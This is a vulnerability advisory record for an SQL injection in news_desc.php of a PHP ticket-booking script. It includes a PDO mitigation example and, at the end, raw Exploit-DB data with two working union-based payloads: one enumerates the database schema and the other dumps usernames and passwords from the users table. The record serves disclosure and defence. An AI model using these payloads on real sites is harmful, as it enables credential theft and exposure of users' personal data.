Vendor: Responsive Events & Movie Ticket Booking Script
By: Ihsan Sencan
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Responsive Events & Movie Ticket Booking Script
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Win7 x64, Kali Linux x64
Year: 2017

Responsive Events & Movie Ticket Booking Script – SQL Injection

An attacker can exploit a SQL injection vulnerability in Responsive Events & Movie Ticket Booking Script to gain access to sensitive information stored in the database. The vulnerability exists because the 'news_desc.php' script does not sufficiently sanitize user-supplied input. By sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable script, an attacker can execute arbitrary SQL commands in the application's database and access sensitive information such as usernames and passwords stored there.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
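
One way to apply this mitigation to a numeric identifier such as the newsid parameter of news_desc.php, as an added PHP example that is not the vendor's code: strict allow-list validation followed by a bound query parameter. The news table, its columns, the helper names and the in-memory SQLite database are assumptions made for illustration.

```php
<?php
// Added example. Table and column names (news, id, title) are hypothetical.

/** Allow-list check: accept 1-9 ASCII digits and nothing else. */
function parse_news_id($raw): ?int
{
    if (!is_string($raw) || preg_match('/\A[0-9]{1,9}\z/', $raw) !== 1) {
        return null;
    }
    return (int) $raw;
}

/** Look up one news row; returns null for invalid or unknown ids. */
function fetch_news(PDO $db, $raw): ?array
{
    $id = parse_news_id($raw);
    if ($id === null) {
        return null; // caller answers 400/404 and never echoes a database error
    }
    // Bound parameter: the value is sent as data, never spliced into the SQL text.
    $stmt = $db->prepare('SELECT id, title FROM news WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed demo data in an in-memory SQLite database so the example runs offline.
// With MySQL, also set PDO::ATTR_EMULATE_PREPARES to false for server-side prepares.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)');
$db->exec("INSERT INTO news (id, title) VALUES (7, 'Opening night')");

// Constructed inputs: one valid id, then values that fail the allow-list.
foreach (['7', '8', '-7', "7'", '7 ', '7abc', ''] as $input) {
    $row = fetch_news($db, $input);
    printf("%-8s => %s\n", var_export($input, true), $row ? $row['title'] : 'rejected or not found');
}
```

Validation alone is a second line of defence here; the bound parameter is what keeps the input out of the SQL text even if the allow-list is later relaxed.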

Exploit-DB raw data:

# # # # # 
# Exploit Title: Responsive Events & Movie Ticket Booking Script - SQL Injection
# Google Dork: N/A
# Date: 06.03.2017
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software : http://www.phpscriptsmall.com/product/responsive-events-movie-ticket-booking-script/
# Demo: http://theaterbookingscript.com/demo/advanced-ticketbooking/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/news_desc.php?newsid=[SQL]
# For example;
# -7'+/*!50000union*/+select+1,0x496873616e2053656e63616e3c62723e7777772e696873616e2e6e6574,3,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),5,6-- -
# users :user_id
# users :email
# users :user_name
# users :password
# users :mobile
# users :country
# users :state
# -7'+/*!50000union*/+select+1,0x496873616e2053656e63616e3c62723e7777772e696873616e2e6e6574,3,/*!13337Concat*/(user_name,0x3a,password),5,6+from+users-- -
# # # # #